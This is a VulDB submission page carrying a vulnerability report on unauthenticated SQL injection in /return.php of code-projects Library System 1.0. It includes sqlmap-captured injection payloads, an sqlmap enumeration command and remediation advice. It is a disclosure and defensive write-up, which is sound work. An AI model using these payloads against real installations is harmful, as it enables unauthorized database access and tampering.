إرسال #699515: code-projects Library System 1.0 SQL Injectionالمعلومات

عنوانcode-projects Library System 1.0 SQL Injection
الوصف # ???? Vulnerability Report: code-projects Software Library 1.0 /return.php SQL Injection ## ???? Summary | Detail | Content | | :--- | :--- | | **Affected Product Name** | Library System | | **Affected Version** | V1.0 | | **Vendor Homepage** | `https://code-projects.org/library-system-in-php-with-source-code/` | | **Vulnerability Type** | SQL Injection (SQLi) | | **Affected File** | `/return.php` | | **Affected Parameter** | `id` (GET) | | **Authentication Required** | None (No login or authorization required to exploit) | | **Submitter** | yudeshui | ----- ## ???? Description and Impact ### Root Cause The vulnerability resides in the file `/return.php`, where the application processes user-supplied input from the **`id`** (ID) parameter. The program **directly concatenates** this parameter value into the SQL query string **without sufficient cleaning, validation, or sanitization**. ### Impact A successful attack allows an attacker to inject malicious SQL code, thereby manipulating the original database query logic. This can lead to severe consequences, including: * **Unauthorized Database Access:** Stealing sensitive data such as user information or book records. * **Data Tampering/Destruction:** Modifying, deleting, or adding records in the database. * **System Control:** In severe cases, gaining system-level control, posing a serious threat to system security and business continuity. ----- ## ????️ Vulnerability Details and PoC The vulnerability is located in the processing of the `id` parameter within a GET request. ### PoC Payload Examples The following are examples of SQL injection payloads captured during testing with the `sqlmap` tool: ``` --- Parameter: id (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (1511=1511) THEN 1 ELSE (SELECT 4364 UNION SELECT 7959) END)) Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1 OR (SELECT 8658 FROM(SELECT COUNT(*),CONCAT(0x71717a7a71,(SELECT (ELT(8658=8658,1))),0x716a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 9721 FROM (SELECT(SLEEP(5)))iHXZ) --- ``` ### Sqlmap Screenshot Example (Database Enumeration) ``` sqlmap -u "http://dede:802/return.php?id=1" --batch --dbs ``` ----- <img width="2162" height="829" alt="Image" src="https://github.com/user-attachments/assets/fe4ed85c-803e-4d48-8469-b52f7933a86b" /> ## ✅ Suggested Repair Measures To completely resolve this SQL injection issue and enhance overall system security, the following defensive coding practices are strongly recommended: ### 1\. Use Prepared Statements and Parameter Binding (Primary Defense) This is the most effective method against SQL injection. Prepared statements separate the structure of the SQL command from the user-supplied data, ensuring the input is treated as a literal string value and cannot be interpreted as executable SQL code. * **Action:** Rewrite all database queries in `/return.php` (and all other files) to use **Prepared Statements** (e.g., using **`mysqli_prepare()`** or **PDO** with parameter binding). ### 2\. Strict Input Validation and Filtering Strictly validate and filter all user input data to ensure it conforms to the expected format, type, and length. * **Action:** For parameters like `id` which should be numeric, use PHP functions like **`filter_var()`** or **`is_numeric()`** for strict checking. ### 3\. Minimize Database User Permissions Adhere to the Principle of Least Privilege. The database account used by the web application for daily operations should only possess the minimum necessary permissions. * **Action:** Ensure the application's database user **does not** have administrative privileges (e.g., `DROP`, `ALTER`, or file system access) to limit the impact of a successful breach. ### 4\. Regular Security Audits Establish a routine process for security code reviews and auditing to proactively identify and fix potential vulnerabilities before they are exploited. ----- Would you like me to provide a specific code example in PHP demonstrating how to use **prepared statements** to fix this vulnerability?
المصدر⚠️ https://github.com/rassec2/dbcve/issues/2
المستخدم
 yudeshui (UID 91129)
ارسال21/11/2025 02:33 PM (5 أشهر منذ)
الاعتدال23/11/2025 10:43 AM (2 days later)
الحالةتمت الموافقة
إدخال VulDB333343 [code-projects Library System 1.0 /return.php معرف حقن SQL]
النقاط20

التالي نظرة عامة السابق

Do you want to use VulDB in your project?

Use the official API to access entries easily!